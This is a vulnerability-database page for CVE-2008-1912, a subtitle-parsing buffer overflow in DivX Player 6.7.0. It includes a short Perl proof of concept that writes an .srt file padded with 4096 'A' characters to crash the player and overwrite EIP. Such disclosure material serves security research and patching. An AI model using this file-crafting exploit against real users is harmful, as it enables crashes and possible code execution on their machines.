Lucene search
+L

DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)

🗓️ 15 Apr 2008 00:00:00Reported by securfrogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

The vulnerability in DivX Player 6.7.0 allows remote attackers to cause a denial of service or execute arbitrary code via a crafted .srt file

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-1912
15 Apr 200800:00
circl
cve
CVE
CVE-2008-1912
22 Apr 200800:00
cve
cvelist
Cvelist
CVE-2008-1912
22 Apr 200800:00
cvelist
exploitdb
Exploit DB
DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow
24 Apr 200800:00
exploitdb
nvd
NVD
CVE-2008-1912
22 Apr 200804:41
nvd
prion
Prion
Stack overflow
22 Apr 200804:41
prion
# DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash  with eip overwritted:
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl
my $file="MOVIE_FILENAME.srt";

my $payload = "A" x 4096;

open( $file, ">>$file") or die "Cannot open $file: $!";

print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;

close($file);

print "$file has been created \n";

# milw0rm.com [2008-04-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.11731
31